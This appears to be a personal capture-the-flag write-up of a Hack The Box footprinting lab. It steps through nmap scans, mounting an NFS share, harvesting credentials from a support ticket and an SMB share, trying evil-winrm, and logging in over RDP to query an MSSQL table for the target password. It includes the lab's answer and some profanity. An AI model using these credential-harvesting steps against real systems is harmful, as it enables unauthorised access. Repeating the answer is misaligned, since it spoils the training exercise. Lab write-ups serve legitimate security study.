Footprinting Lab Medium
Give: Username HTB
Find the password for HTB
Nmap
nmap -p- --min-rate=1000 -sV 10.129.72.67
Nmap scan report for 10.129.72.67
Host is up (0.073s latency).
Not shown: 65519 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2-4 (RPC #100000)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open nlockmgr 1-4 (RPC #100021)
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.43 seconds
do a script scan on RDP 3389 rdp script scan
do another nmap general aggresive scan nmap aggresive scan
identified services:
- SMB on 445/139
- NFS on 111/2049
- WinRM on 5985
- WMI on 135
- RDP on 3389
NFS
#NFS
Start with NFS nfs script scan. Try to mount.
> showmount -e 10.129.72.67
Export list for 10.129.72.67:
/TechSupport (everyone)
We see TechSupport available.
> mkdir target-NFS
> sudo mount -t nfs 10.129.72.67:/ ./target-NFS/ -o nolock
I don't have permission to check inside TechSupport
> cd TechSupport
bash: cd: TechSupport: Permission denied
!! Hint used at this step !!
I'm fucking root. I get to see whatever the fuck I want.
> sudo su
> cd TechSupport
> ls -la
-rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283778.txt
-rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283779.txt
-rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283780.txt
-rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283781.txt
-rwx------ 1 nobody nogroup 1305 Nov 10 2021 ticket4238791283782.txt
-rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283783.txt
-rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283784.txt
Saw an interesting file. read it.
> cat ticket4238791283782.txt
Conversation with InlaneFreight Ltd
Started on November 10, 2021 at 01:27 PM London time GMT (GMT+0200)
---
01:27 PM | Operator: Hello,.
So what brings you here today?
01:27 PM | alex: hello
01:27 PM | Operator: Hey alex!
01:27 PM | Operator: What do you need help with?
01:36 PM | alex: I run into an issue with the web config file on the system for the smtp server. do you mind to take a look at the config?
01:38 PM | Operator: Of course
01:42 PM | alex: here it is:
1smtp {
2 host=smtp.web.dev.inlanefreight.htb
3 #port=25
4 ssl=true
5 user="alex"
6 password="lol123!mD"
7 from="alex.g@web.dev.inlanefreight.htb"
8}
9
10securesocial {
11
12 onLoginGoTo=/
13 onLogoutGoTo=/login
14 ssl=false
15
16 userpass {
17 withUserNameSupport=false
18 sendWelcomeEmail=true
19 enableGravatarSupport=true
20 signupSkipLogin=true
21 tokenDuration=60
22 tokenDeleteInterval=5
23 minimumPasswordLength=8
24 enableTokenJob=true
25 hasher=bcrypt
26 }
27
28 cookie {
29 # name=id
30 # path=/login
31 # domain="10.129.2.59:9500"
32 httpOnly=true
33 makeTransient=false
34 absoluteTimeoutInMinutes=1440
35 idleTimeoutInMinutes=1440
36 }
---
Got credentials alex:lol123!mD
SMB
#SMB
try connecting using HTB
> smbclient -L //10.129.143.191 -U HTB
Password for [WORKGROUP\HTB]:
session setup failed: NT_STATUS_LOGON_FAILURE
try connecting with a Null session.
>rpcclient -U "" 10.129.143.191
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
try connecting with alex:
> smbclient -L //10.129.143.191 -U alex
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
devshare Disk
IPC$ IPC Remote IPC
Users Disk
connect to devshare
> smbclient //10.129.143.191/devshare -U alex
Password for [WORKGROUP\alex]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Nov 10 10:12:22 2021
.. D 0 Wed Nov 10 10:12:22 2021
important.txt A 16 Wed Nov 10 10:12:55 2021
6367231 blocks of size 4096. 2592459 blocks available
smb: \> get important.txt
getting file \important.txt of size 16 as important.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> quit
┌─[root@htb-08ig5cgrwa]─[/home/htb-ac-1530632]
└──╼ #cat important.txt
sa:87N1ns@slls83
It seems like I got another set of credentials
sa:87N1ns@slls83
connect to user share
> smbclient //10.129.143.191/users -U alex
Password for [WORKGROUP\alex]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Wed Nov 10 18:25:55 2021
.. DR 0 Wed Nov 10 18:25:55 2021
alex D 0 Wed Nov 10 18:25:55 2021
Default DHR 0 Tue Dec 15 04:32:11 2020
desktop.ini AHS 174 Sat Sep 15 02:16:48 2018
6367231 blocks of size 4096. 2592458 blocks available
smb: \> cd alex
smb: \alex\> ls
. D 0 Wed Nov 10 18:25:55 2021
.. D 0 Wed Nov 10 18:25:55 2021
3D Objects DR 0 Wed Nov 10 08:19:25 2021
AppData DH 0 Wed Nov 10 08:19:22 2021
Contacts DR 0 Wed Nov 10 08:19:25 2021
Desktop DR 0 Wed Nov 10 17:34:44 2021
devshare D 0 Wed Nov 10 10:12:22 2021
Documents DR 0 Wed Nov 10 18:25:27 2021
Downloads DR 0 Wed Nov 10 08:19:25 2021
Favorites DR 0 Wed Nov 10 08:19:25 2021
Links DR 0 Wed Nov 10 08:19:26 2021
Music DR 0 Wed Nov 10 08:19:25 2021
NTUSER.DAT AHn 3670016 Sun Nov 24 02:14:59 2024
ntuser.dat.LOG1 AHS 12288 Wed Nov 10 08:19:21 2021
ntuser.dat.LOG2 AHS 458752 Wed Nov 10 08:19:21 2021
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf AHS 65536 Wed Nov 10 08:20:10 2021
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Wed Nov 10 08:19:21 2021
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Wed Nov 10 08:19:21 2021
ntuser.ini HS 20 Wed Nov 10 08:19:22 2021
Pictures DR 0 Wed Nov 10 08:19:25 2021
Saved Games DR 0 Wed Nov 10 08:19:26 2021
Searches DR 0 Wed Nov 10 08:19:26 2021
TechSupport D 0 Sun Nov 24 01:10:49 2024
Videos DR 0 Wed Nov 10 08:19:25 2021
6367231 blocks of size 4096. 2592458 blocks available
Did not find anything interesting.
WinRM
tried to login with credentials alex:lol123!mD and sa:87N1ns@slls83
evil-winrm -i 10.129.143.191 -u sa -p 87N1ns@slls83
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
Both did not work
RDP
#RDP
For the love of my life I can't fucking figure out what is wrong with the pwnbox. It did not let me connect through xfreerdp. Instead, I had to use Remmina
> sudo apt update && sudo apt install remmina remmina-plugin-rdp -y
> remmina
credentials sa:87N1ns@slls83 did not work
I logged in via credentials alex:lol123!mD
There's a Microsoft SQL Studio app. When I click into it, the login username is already filled with sa, so I used sa's password.
Suprisingly, I cannot login.
I looked up the walkthrough and it says it's password reuse. Admin is also using this password. What the fuck.
#credential_stuffing
Left click on the app and select "run as administrator" Input sa's passwords
Then we could connect to the database.
MSSQL Select all tables:
#mssql
SELECT TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE';
outputted devsacc
SELECT *
FROM devsacc
a list of names and passwords.
SELECT *
FROM devsacc
WHERE name LIKE "%HTB%"
id name Password
157 HTB lnch7ehrdn43i7AoqVPK4zWR